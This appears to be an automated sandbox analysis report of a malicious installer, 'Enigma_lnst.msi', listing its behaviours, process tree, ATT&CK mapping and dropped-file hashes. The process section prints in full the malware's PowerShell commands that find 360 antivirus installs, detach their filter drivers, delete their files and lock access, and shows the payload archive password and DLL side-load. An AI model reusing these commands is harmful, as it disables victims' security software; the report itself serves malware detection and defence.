Overview

overview

9

Static

static

1

Enigma_lnst.msi

windows10-1703-x64

9

Enigma_lnst.msi

windows7-x64

9

Enigma_lnst.msi

windows10-2004-x64

9

Enigma_lnst.msi

windows11-21h2-x64

9

Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    12-07-2024 17:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Enigma_lnst.msi

  • Size

    186.9MB

  • MD5

    1befc9492cae2fa2ff5a89177e9d3063

  • SHA1

    061f689bb3802cf3da9cb5f8658beb5895d5650f

  • SHA256

    90cee7a2160a5506535b05a1da860b3db9270154a27b4614001a73921eb516f3

  • SHA512

    c199d79049af3c486fcbe35d6ae0825a8c2cae134fec4fe740c55c3677b29b7527958aaaf1c44890472af0a8d9e0e0db1ed96ca979da0619e089ff2486038243

  • SSDEEP

    3145728:L7y8IlnJhDfWQ3yIe3EPleGEHmdygafuvI2tc9XzlRn6lF+RQ+ZspLkOvnkBM+k6:i8oDfW6yIpPwGEHmdafuvXc9Bpe+S+6y

Score
9/10
defense_evasionevasionpersistenceprivilege_escalation

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
    evasion
  • Modifies RDP port number used by Windows 1 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 11 IoCs
  • Executes dropped EXE 3 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

    defense_evasion
  • Loads dropped DLL 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
    persistenceprivilege_escalation
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Enigma_lnst.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2948
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2916
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:2444
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 51D123E60AA767B4C3FE88BFD9E93667
        2⤵
        • Loads dropped DLL
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2648
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\SysWOW64\cmd.exe" /c "fltmc.exe && exit 0||exit 1"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3384
          • C:\Windows\SysWOW64\fltMC.exe
            fltmc.exe
            4⤵
              PID:3580
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'360safe_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
            3⤵
            • Hide Artifacts: Ignore Process Interrupts
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2056
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'360sd_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
            3⤵
            • Hide Artifacts: Ignore Process Interrupts
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:868
          • C:\ProgramData\Data\un.exe
            "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar qbcore.dll C:\ProgramData\
            3⤵
            • Executes dropped EXE
            PID:2744
          • C:\ProgramData\Data\un.exe
            "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\
            3⤵
            • Executes dropped EXE
            PID:2544
          • C:\ProgramData\iusb3mon.exe
            "C:\ProgramData\iusb3mon.exe" false
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4140
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c echo.>c:\odbc.inst.ini
              4⤵
                PID:4084
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\System32\rundll32.exe" C:\ProgramData\qbcore.dll,cef_v8value_create_string
                4⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                PID:3364
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo.>c:\inst.ini
                4⤵
                  PID:1872
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo.>c:\inst.ini
                  4⤵
                    PID:356
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4632
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
              1⤵
              • Checks SCSI registry key(s)
              • Modifies data under HKEY_USERS
              PID:4112
            • C:\Windows\System32\rundll32.exe
              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              1⤵
                PID:4420

              Network

              MITRE ATT&CK Enterprise v15

              Reconnaissance

              Resource Development

              Initial Access

              Execution

              Persistence

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Event Triggered Execution

              1
              T1546

              Installer Packages

              1
              T1546.016

              Privilege Escalation

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Event Triggered Execution

              1
              T1546

              Installer Packages

              1
              T1546.016

              Defense Evasion

              Hide Artifacts

              1
              T1564

              Ignore Process Interrupts

              1
              T1564.011

              Modify Registry

              1
              T1112

              Virtualization/Sandbox Evasion

              2
              T1497

              Credential Access

              Discovery

              Peripheral Device Discovery

              2
              T1120

              Query Registry

              6
              T1012

              System Information Discovery

              5
              T1082

              Virtualization/Sandbox Evasion

              2
              T1497

              Lateral Movement

              Remote Services

              1
              T1021

              Remote Desktop Protocol

              1
              T1021.001

              Collection

              Command and Control

              Exfiltration

              Impact

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Config.Msi\e57c11e.rbs
                Filesize

                9KB

                MD5

                745b4027f2090a3566e61455bfab3242

                SHA1

                4444e8af0232d6516ce253623068e84205352837

                SHA256

                cad5156c0a569f9ad772e8824b0f72c7ed227b57487474c7973872b669d57625

                SHA512

                ecfb61f31f4ae1e01aba326c8ce6432c501b9236f0ccc6a042cdbf5b0237d40f6e0220514b11d6b7fc1f27cccb0663bfdca6bf7bba27f2d09d772c9ccb63fab3

                Download Submit

              • C:\ProgramData\Data\rar.ini
                Filesize

                10B

                MD5

                51c11db1054dd4650a33bf481ec27060

                SHA1

                17686b75163d8753be27e407aad97a76f311fc7b

                SHA256

                fc835086345b170ac995c35f24546e1b7268e3d3524a125a9396a4ec8b7d3f35

                SHA512

                94d5c2a0cb03b38657bab246a695c6528fc5f7d3ddbe716641dd59ec83a67d6ab28c083000026d10114e7ab8f8225f7c90c9fce25ef0611f46aa3899d096d80f

                Download Submit

              • C:\ProgramData\Data\un.exe
                Filesize

                601KB

                MD5

                4fdc31997eb40979967fc04d9a9960f3

                SHA1

                7f13bd62c13324681913304644489bb6b66f584a

                SHA256

                e9ea78fab020718cb75a116993bfa2a5fe71c163a801995adb9e5abebc7990a2

                SHA512

                15146e24afcfea221616ca1f049d96e8a5f9b1eccefd3a27df150e4699993889fc1ab4952f2ba1ab519b1056baaeeb4490894bc795d0cb4630f663fa08316b9a

                Download Submit

              • C:\ProgramData\Data\upx.rar
                Filesize

                2.3MB

                MD5

                6902353b10ae3b51d0d4dce6711bdc5e

                SHA1

                2c4abeda0be51037d90abdd22ce46660dc84a0fb

                SHA256

                525c842b1e10058e35b28593bcf2efd8b62e0587d5e0fc27e4289cdafaa9119a

                SHA512

                fb7d0590934ee8cb28dca9b4e0c3d2ee751ecfeeaaa5d399cc01c147c1ff051b58b23f88bced572000db8516ec47b84c6a6604131d69a6dd9e80c010b482b047

                Download Submit

              • C:\ProgramData\Microsoft\Program\ziliao.jpg
                Filesize

                356KB

                MD5

                fae472e4f35ea37d87ec8e75f8f87424

                SHA1

                dc4cecc39dcda0f27208d976f4c890aca60d38de

                SHA256

                ece4bdb4d10691514983e689e00fe376cd96d47b59c19d418514df6e075635b0

                SHA512

                6bdc5e60d917007c5970cde0fe0d8bdbaa6285e8351968bba0db5c42230448a2d6028e4f1d29bfbb72224a7bdc10c85d45614a113896d4eaebead949990df845

                Download Submit

              • C:\ProgramData\iusb3mon.exe
                Filesize

                604KB

                MD5

                75ff06aa5acfa803ad99b4fdcc43dd68

                SHA1

                8a120948f1e30fa8a2ef0d839c5300bbdfa9a8e4

                SHA256

                a09ee1f7481c2f215c3a1d2335c5181fcf52eea7c9d82bb885cb14dc419d4e51

                SHA512

                71216288e436dab8d824cd9eb300286095687d855f5beb4e2732a8ef90c7536fad2d82ee61373e85a65a8950ce5979757518578d522bad6bd8496b363b9ead3c

                Download Submit

              • C:\ProgramData\qbcore.dll
                Filesize

                2.7MB

                MD5

                c31ab7e7b6832f1b99d6914e1594eb6d

                SHA1

                ccc6f7e864548b9a7cbb5118c75e5f90db14ac5d

                SHA256

                3bda309984263aa5517dec01fbed324aaec44b514173aa7263cc9d2e0d2a5e73

                SHA512

                ff358abab061cc85bb1f51fc6a4a954f46bcf79863728c83b023cecfda2e7f4b61b8d30fe609af3f7bf01b2c23be417eb22f71d7e68b35749d78b85083469f99

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                Filesize

                2KB

                MD5

                6bf0e5945fb9da68e1b03bdaed5f6f8d

                SHA1

                eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

                SHA256

                dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

                SHA512

                977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                17KB

                MD5

                44ff0d83a827473d136c879864c86215

                SHA1

                9fd087a54344aa27e00199edbd050c9d65f47a24

                SHA256

                97969d2c3d431d681d3f3693549fbc66faf473964b6807c25808efcc39d53fcb

                SHA512

                fcf91b862df809d77ad5bf24901a5465ce5b58ff31757820a8042635674d8efbb6e4d65c11b16f15b28d7de174c722bb43bbb9211f0b667a8cc49876e0efb368

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xdlxozif.35l.ps1
                Filesize

                1B

                MD5

                c4ca4238a0b923820dcc509a6f75849b

                SHA1

                356a192b7913b04c54574d18c28d46e6395428ab

                SHA256

                6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                SHA512

                4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                Download Submit

              • C:\Windows\Installer\MSIC1C9.tmp
                Filesize

                990KB

                MD5

                b9ff2dd6924711531e59e90581cda548

                SHA1

                6c8d572587c40a1fd8c20bd4f1929bb0fbb12009

                SHA256

                ad564d4d64bb74ea6819e081534131f6f78e3c019d37abbc3eef8e09dfed96d7

                SHA512

                d026c8128c1a182aa7f9d7cba179b411ad679e3bf89723a3498ab493cb6938579ee703ade35595f6b5178413e0df7f6f9a152a5036759e42f1d6f52cc0a61227

                Download Submit

              • C:\odbc.inst.ini
                Filesize

                2B

                MD5

                81051bcc2cf1bedf378224b0a93e2877

                SHA1

                ba8ab5a0280b953aa97435ff8946cbcbb2755a27

                SHA256

                7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

                SHA512

                1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

                Download Submit

              • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                Filesize

                26.0MB

                MD5

                da040b8c7df5d95320e44aa7787676d2

                SHA1

                0bf3d55c5554701c72ad75d0037143344df9e0f1

                SHA256

                3e07195425df18e7a9db152888d540b042011c5de5497ca4d3846cdeb8feb8b2

                SHA512

                40be6e65b99dfe85b7b42fdccc82fd3f8d651b9dd8ce4f33439817218944941886b72bf8104f63b8c2d7ee7464d0217d93a31cabfe13dbcc7f172ebfb8b01beb

                Download Submit

              • \??\Volume{38ff9706-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{7a2b7b12-d448-4639-9068-5df872bd9100}_OnDiskSnapshotProp
                Filesize

                5KB

                MD5

                ff9b21de4ccdca6d703486ec39c9003c

                SHA1

                ccb25f7316a6dcfae41b64bb544a437eedd84b51

                SHA256

                008f9d221074cfbd53abe1652915e1dff0c9d4dc1a621926895628fa748a9542

                SHA512

                2023962c757c071f25680254756851fb91696bec273fa524f29553a4c049303e900e0f6ed4394cdb749b589e1d66032fc0d4c5852627cd6efec984fb43f284f2

                Download Submit

              • memory/868-25-0x0000000006F80000-0x0000000006FE6000-memory.dmp

                Filesize

                408KB

                Download

              • memory/868-24-0x0000000006F10000-0x0000000006F76000-memory.dmp

                Filesize

                408KB

                Download

              • memory/868-21-0x0000000001010000-0x0000000001046000-memory.dmp

                Filesize

                216KB

                Download

              • memory/2056-28-0x0000000007F00000-0x0000000007F4B000-memory.dmp

                Filesize

                300KB

                Download

              • memory/2056-26-0x0000000007670000-0x00000000079C0000-memory.dmp

                Filesize

                3.3MB

                Download

              • memory/2056-86-0x0000000008E80000-0x0000000008F14000-memory.dmp

                Filesize

                592KB

                Download

              • memory/2056-87-0x0000000008B90000-0x0000000008BAA000-memory.dmp

                Filesize

                104KB

                Download

              • memory/2056-88-0x0000000008DE0000-0x0000000008E02000-memory.dmp

                Filesize

                136KB

                Download

              • memory/2056-32-0x0000000007D20000-0x0000000007D96000-memory.dmp

                Filesize

                472KB

                Download

              • memory/2056-22-0x0000000007040000-0x0000000007668000-memory.dmp

                Filesize

                6.2MB

                Download

              • memory/2056-23-0x0000000006CB0000-0x0000000006CD2000-memory.dmp

                Filesize

                136KB

                Download

              • memory/2056-27-0x0000000006EF0000-0x0000000006F0C000-memory.dmp

                Filesize

                112KB

                Download

              • memory/2056-89-0x0000000009420000-0x000000000991E000-memory.dmp

                Filesize

                5.0MB

                Download

              • memory/3364-129-0x00000000728A0000-0x0000000072B59000-memory.dmp

                Filesize

                2.7MB

                Download

              • memory/3364-154-0x00000000728A0000-0x0000000072B59000-memory.dmp

                Filesize

                2.7MB

                Download

              • memory/3364-179-0x00000000728A0000-0x0000000072B59000-memory.dmp

                Filesize

                2.7MB

                Download

              • memory/4140-134-0x0000000010000000-0x0000000010061000-memory.dmp

                Filesize

                388KB

                Download

              • memory/4140-125-0x00000000728A0000-0x0000000072B59000-memory.dmp

                Filesize

                2.7MB

                Download

              • memory/4140-153-0x00000000728A0000-0x0000000072B59000-memory.dmp

                Filesize

                2.7MB

                Download

              • memory/4140-164-0x00000000728A0000-0x0000000072B59000-memory.dmp

                Filesize

                2.7MB

                Download